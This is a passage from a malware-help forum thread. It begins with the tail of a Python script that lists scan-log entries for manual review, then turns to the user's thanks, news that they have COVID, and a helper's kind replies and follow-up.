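    r'FirewallRules: [{CFF24E33-06E2-417A-ADE7-E746B0359CBB}] => (Allow) LPort=5357',
]

if __name__ == "__main__":
    for f in triage(SAMPLE):
        print(f["kind"], f["name"], f["reasons"], f["urls"])
```

The output is a review list only; it does not generate a fixlist, which still has to be written for the specific machine.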

Thank you all very much for your help. I wanted to let you know that I have COVID and hope to be back on January 26. Apologies for not checking in, but as soon as I recover I will continue with the case. Thanks again. Take good care, and may God bless us all! A hug!

3 likes

You're welcome, @hectordj69.

OK, don't worry, it's no problem @hectordj69. We'll wait for you here, no problem, but do come back. I hope your COVID is mild and minor and that you're well again in a few days.

So :+1: we'll be waiting for you here on the 26th.

Thank you very much for your kind words and for your whole last message of thanks. Comments like yours are what keep me going and what really motivates me most to keep taking on new cases. Getting comments like this last one is priceless.

Get well and let us know.

Regards.

3 likes

Hi @hectordj69,

I saw that you logged into the forum very recently. I hope you're feeling better.

Were you able to make any progress?

Regards.

1 like